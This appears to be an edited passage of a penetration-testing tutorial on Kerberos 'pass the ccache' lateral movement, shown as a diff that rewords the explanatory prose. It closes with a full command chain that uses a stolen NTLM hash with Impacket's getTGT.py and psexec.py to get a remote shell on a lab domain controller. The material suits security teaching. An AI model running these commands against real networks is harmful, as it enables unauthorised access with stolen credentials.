Lateral Movement: Pass the Ccache

 Method 2: KRB5CCNAME

-Similarly we have use getTGT to to generate the ccache and used KERB5CCNAME pass the ccahe file for the requested service.
-This is completely remote attack without using local system of compromised victim, but you need to compromise NTLM hashes for that, type following to conduct pass the ccache attack remotly.
+Similarly, we use getTGT to generate the ccache and pass the ccache file for the requested service using KERB5CCNAME.
+This approach is a completely remote attack without using the local system of the compromised victim.
+However, you need to compromise NTLM hashes for that.
+Type the following to conduct the pass-the-ccache attack remotely.

 python getTGT.py -dc-ip 192.168.1.105 -hashes :64fbae31cc352fc26af97cbdef151e03 ignite.local/yashika export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local